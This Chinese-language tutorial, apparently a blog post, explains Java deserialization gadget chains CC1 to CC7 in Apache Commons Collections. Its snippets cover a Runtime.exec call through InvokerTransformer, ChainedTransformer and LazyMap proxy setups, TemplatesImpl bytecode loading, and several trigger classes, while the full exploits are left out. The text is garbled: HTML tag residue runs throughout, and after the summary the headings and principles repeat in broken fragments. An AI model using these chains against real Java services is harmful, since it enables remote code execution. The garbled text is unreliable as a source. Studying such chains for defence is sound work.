Java反序列化漏洞利用链(CC1-CC7)调试解析<\/h1>

概述<\/h2>
本文详细解析了Apache Commons Collections库中存在的反序列化漏洞利用链(CC1-CC7)，包括各条链的构造原理、调试过程以及实际利用方法。这些漏洞利用链利用了Java反序列化机制和Apache Commons Collections库中的特定类和方法，通过精心构造的序列化数据实现远程代码执行。<\/p>

CC1链分析<\/h2>

核心原理<\/h3>

CC1链的核心是利用InvokerTransformer<\/code>类的transform<\/code>方法进行反射调用：<\/p>

public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Class<?><\/span> cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>            Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>this<\/span>.<\/span>iMethodName<\/span>,<\/span> this<\/span>.<\/span>iParamTypes<\/span>);<\/span>
<\/span><\/span>            return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> this<\/span>.<\/span>iArgs<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

构造命令执行<\/strong>：<\/li>
<\/ol>
Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>});<\/span>
<\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>runtime);<\/span>
<\/span><\/span><\/code><\/pre>

寻找调用链<\/strong>：<\/p>

TransformedMap.checkSetValue<\/code>调用了transform<\/code><\/li>
AbstractInputCheckedMapDecorator.setValue<\/code>触发checkSetValue<\/code><\/li>
通过遍历Map触发setValue<\/code><\/li>
<\/ul>
<\/li>

完整利用链<\/strong>：<\/p>
<\/li>
<\/ol>
Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>});<\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"a"<\/span>,<\/span>1<\/span>);<\/span>
<\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span>null<\/span>,<\/span>invokerTransformer);<\/span>
<\/span><\/span>for<\/span>(<\/span>Map.<\/span>Entry<\/span> entry:<\/span>transformedMap.<\/span>entrySet<\/span>())<\/span> {<\/span>
<\/span><\/span>    entry.<\/span>setValue<\/span>(<\/span>runtime);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
解决Runtime不可序列化问题<\/strong>：

使用ChainedTransformer<\/code>和ConstantTransformer<\/code>构造调用链：<\/li>
<\/ol>
Transformer[]<\/span> Transformer =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>Transformer);<\/span>
<\/span><\/span><\/code><\/pre>
最终EXP<\/strong>：<\/li>
<\/ol>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>关键点<\/h3>

需要将Map的key设置为注解类的属性名（如"value"）<\/li>
JDK 8u71之后修复了AnnotationInvocationHandler<\/code>的readObject<\/code>方法<\/li>
<\/ul>
CC1_LazyMap变种<\/h2>
核心差异<\/h3>
使用LazyMap<\/code>代替TransformedMap<\/code>，利用动态代理触发get<\/code>方法调用。<\/p>
利用步骤<\/h3>

构造LazyMap<\/strong>：<\/li>
<\/ol>
Map map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> chainedTransformer);<\/span>
<\/span><\/span><\/code><\/pre>
创建动态代理<\/strong>：<\/li>
<\/ol>
Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span>constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span>lazyMap);<\/span>
<\/span><\/span>Map proxyMap =<\/span> (<\/span>Map)<\/span>Proxy.<\/span>newProxyInstance<\/span>(<\/span>Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> invocationHandler);<\/span>
<\/span><\/span><\/code><\/pre>
最终EXP<\/strong>：<\/li>
<\/ol>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>CC6链分析<\/h2>
适用场景<\/h3>
针对JDK 8u71及以上版本，绕过AnnotationInvocationHandler<\/code>修复。<\/p>
核心原理<\/h3>
利用TiedMapEntry<\/code>的getValue<\/code>调用map.get()<\/code>，通过hashCode()<\/code>触发：<\/p>
public<\/span> int<\/span> hashCode<\/span>()<\/span> {<\/span>
<\/span><\/span>    Object value =<\/span> getValue();<\/span>
<\/span><\/span>    return<\/span> (<\/span>getKey()<\/span> ==<\/span> null<\/span> ?<\/span> 0<\/span> :<\/span> getKey().<\/span>hashCode<\/span>())<\/span> ^<\/span>
<\/span><\/span>           (<\/span>value ==<\/span> null<\/span> ?<\/span> 0<\/span> :<\/span> value.<\/span>hashCode<\/span>());<\/span> 
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

构造调用链<\/strong>：<\/li>
<\/ol>
Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> chainedTransformer);<\/span>
<\/span><\/span>TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span>"keykey"<\/span>);<\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> ser_map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>ser_map.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span>"value"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
解决提前触发问题<\/strong>：<\/li>
<\/ol>
Transformer[]<\/span> fakeTransformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>)};<\/span>
<\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>Field f =<\/span> ChainedTransformer.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"iTransformers"<\/span>);<\/span>
<\/span><\/span>f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>f.<\/span>set<\/span>(<\/span>chainedTransformer,<\/span> Transformer);<\/span>
<\/span><\/span>lazyMap.<\/span>remove<\/span>(<\/span>"keykey"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
最终EXP<\/strong>：<\/li>
<\/ol>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>无数组改造版<\/h3>
利用加载字节码方式：<\/p>
TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>\/\/ 设置_bytecodes等字段
<\/span><\/span><\/span><\/span>Transformer transformer =<\/span> new<\/span> InvokerTransformer(<\/span>"toString"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>Field iMethodName =<\/span> transformer.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"iMethodName"<\/span>);<\/span>
<\/span><\/span>iMethodName.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>iMethodName.<\/span>set<\/span>(<\/span>transformer,<\/span>"newTransformer"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>CC3链分析<\/h2>
核心原理<\/h3>
利用TemplatesImpl<\/code>类加载字节码实现命令执行。<\/p>
关键方法<\/h3>

defineTransletClasses()<\/code>调用defineClass()<\/code><\/li>
getTransletInstance()<\/code>调用defineTransletClasses()<\/code><\/li>
newTransformer()<\/code>调用getTransletInstance()<\/code><\/li>
<\/ol>
利用步骤<\/h3>

设置TemplatesImpl属性<\/strong>：<\/li>
<\/ol>
TemplatesImpl tmpl =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>Field namefeld =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>namefeld.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>namefeld.<\/span>set<\/span>(<\/span>tmpl,<\/span>"aaa"<\/span>);<\/span>
<\/span><\/span>Field bytefeld =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>bytefeld.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"恶意类路径"<\/span>));<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> bytecodes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>bytefeld.<\/span>set<\/span>(<\/span>tmpl,<\/span>bytecodes);<\/span>
<\/span><\/span><\/code><\/pre>
恶意类要求<\/strong>：

必须继承AbstractTranslet<\/code>：<\/li>
<\/ol>
public<\/span> class<\/span> test<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        \/\/ 恶意代码
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 必须实现的方法
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>

两种调用方式<\/strong>：<\/p>

直接反射调用newTransformer<\/code><\/li>
通过TrAXFilter<\/code>构造方法触发<\/li>
<\/ul>
<\/li>

最终EXP<\/strong>：<\/p>
<\/li>
<\/ol>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>CC2链分析<\/h2>
核心原理<\/h3>
利用PriorityQueue<\/code>触发TransformingComparator.compare()<\/code>调用transform()<\/code>。<\/p>
利用步骤<\/h3>

构造调用链<\/strong>：<\/li>
<\/ol>
Comparator comparator =<\/span> new<\/span> TransformingComparator(<\/span>transformerChain);<\/span>
<\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
最终EXP<\/strong>：<\/li>
<\/ol>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>无数组改造版<\/h3>
PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>setFieldValue(<\/span>transformer,<\/span> "iMethodName"<\/span>,<\/span> "newTransformer"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>CC4链分析<\/h2>
核心原理<\/h3>
结合CC2的入口和CC3的TrAXFilter<\/code>加载字节码方式。<\/p>
最终EXP<\/h3>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>CC5链分析<\/h2>
核心原理<\/h3>
利用BadAttributeValueExpException<\/code>的readObject<\/code>触发toString<\/code>。<\/p>
利用步骤<\/h3>

构造调用链<\/strong>：<\/li>
<\/ol>
BadAttributeValueExpException obj =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>Field val =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>val.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>val.<\/span>set<\/span>(<\/span>obj,<\/span>tiedMapEntry);<\/span>
<\/span><\/span><\/code><\/pre>
最终EXP<\/strong>：<\/li>
<\/ol>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>CC7链分析<\/h2>
核心原理<\/h3>
利用Hashtable<\/code>触发LazyMap<\/code>的调用链。<\/p>
利用步骤<\/h3>

构造两个LazyMap<\/strong>：<\/li>
<\/ol>
Map lazyMap1 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap1,<\/span> chainedTransformer);<\/span>
<\/span><\/span>Map lazyMap2 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap2,<\/span> chainedTransformer);<\/span>
<\/span><\/span><\/code><\/pre>
放入Hashtable<\/strong>：<\/li>
<\/ol>
Hashtable hashtable =<\/span> new<\/span> Hashtable();<\/span>
<\/span><\/span>hashtable.<\/span>put<\/span>(<\/span>lazyMap1,<\/span>1<\/span>);<\/span>
<\/span><\/span>hashtable.<\/span>put<\/span>(<\/span>lazyMap2,<\/span>2<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
最终EXP<\/strong>：<\/li>
<\/ol>
\/\/ 完整代码见原文
<\/span><\/span><\/span><\/code><\/pre>总结<\/h2>

核心思路<\/strong>：利用Java反序列化机制和Apache Commons Collections中的可序列化类构造调用链<\/li>
关键类<\/strong>：

InvokerTransformer<\/code>：反射调用任意方法<\/li>
ChainedTransformer<\/code>：链式调用多个Transformer<\/li>
TransformedMap<\/code>\/LazyMap<\/code>：触发transform\/get调用<\/li>
TemplatesImpl<\/code>：加载字节码实现命令执行<\/li>
<\/ul>
<\/li>
适用场景<\/strong>：

CC1\/CC1_LazyMap：低版本JDK<\/li>
CC6：高版本JDK绕过<\/li>
CC3\/CC4：字节码加载方式<\/li>
CC5\/CC7：特殊入口点利用<\/li>
<\/ul>
<\/li>
<\/ol>
通过深入理解这些利用链的构造原理，可以帮助安全研究人员更好地分析Java反序列化漏洞，并开发相应的防护措施。<\/p>

Java反序列化漏洞利用链(CC1-CC7)调试解析<\/h1>

CC1链分析<\/h2>

CC1_LazyMap变种<\/h2>

核心差异<\/h3>
使用`LazyMap<\/code>代替TransformedMap<\/code>，利用动态代理触发get<\/code>方法调用。<\/p>`

CC6链分析<\/h2>

适用场景<\/h3>
针对JDK 8u71及以上版本，绕过`AnnotationInvocationHandler<\/code>修复。<\/p>`

CC3链分析<\/h2>

核心原理<\/h3>
利用`TemplatesImpl<\/code>类加载字节码实现命令执行。<\/p>`

CC2链分析<\/h2>

核心原理<\/h3>
利用`PriorityQueue<\/code>触发TransformingComparator.compare()<\/code>调用transform()<\/code>。<\/p>`

CC4链分析<\/h2>

核心原理<\/h3>
结合CC2的入口和CC3的`TrAXFilter<\/code>加载字节码方式。<\/p>`

CC5链分析<\/h2>

核心原理<\/h3>
利用`BadAttributeValueExpException<\/code>的readObject<\/code>触发toString<\/code>。<\/p>`

CC7链分析<\/h2>

核心原理<\/h3>
利用`Hashtable<\/code>触发LazyMap<\/code>的调用链。<\/p>`

Java反序列化漏洞利用链(CC1-CC7)调试解析<\/h1>

CC1链分析<\/h2>

CC1_LazyMap变种<\/h2>

核心差异<\/h3> 使用LazyMap<\/code>代替TransformedMap<\/code>，利用动态代理触发get<\/code>方法调用。<\/p>

CC6链分析<\/h2>

适用场景<\/h3> 针对JDK 8u71及以上版本，绕过AnnotationInvocationHandler<\/code>修复。<\/p>

CC3链分析<\/h2>

核心原理<\/h3> 利用TemplatesImpl<\/code>类加载字节码实现命令执行。<\/p>

CC2链分析<\/h2>

核心原理<\/h3> 利用PriorityQueue<\/code>触发TransformingComparator.compare()<\/code>调用transform()<\/code>。<\/p>

CC4链分析<\/h2>

核心原理<\/h3> 结合CC2的入口和CC3的TrAXFilter<\/code>加载字节码方式。<\/p>

CC5链分析<\/h2>

核心原理<\/h3> 利用BadAttributeValueExpException<\/code>的readObject<\/code>触发toString<\/code>。<\/p>

CC7链分析<\/h2>

核心原理<\/h3> 利用Hashtable<\/code>触发LazyMap<\/code>的调用链。<\/p>

核心差异<\/h3>
使用`LazyMap<\/code>代替TransformedMap<\/code>，利用动态代理触发get<\/code>方法调用。<\/p>`

适用场景<\/h3>
针对JDK 8u71及以上版本，绕过`AnnotationInvocationHandler<\/code>修复。<\/p>`

核心原理<\/h3>
利用`TemplatesImpl<\/code>类加载字节码实现命令执行。<\/p>`

核心原理<\/h3>
利用`PriorityQueue<\/code>触发TransformingComparator.compare()<\/code>调用transform()<\/code>。<\/p>`

核心原理<\/h3>
结合CC2的入口和CC3的`TrAXFilter<\/code>加载字节码方式。<\/p>`

核心原理<\/h3>
利用`BadAttributeValueExpException<\/code>的readObject<\/code>触发toString<\/code>。<\/p>`

核心原理<\/h3>
利用`Hashtable<\/code>触发LazyMap<\/code>的调用链。<\/p>`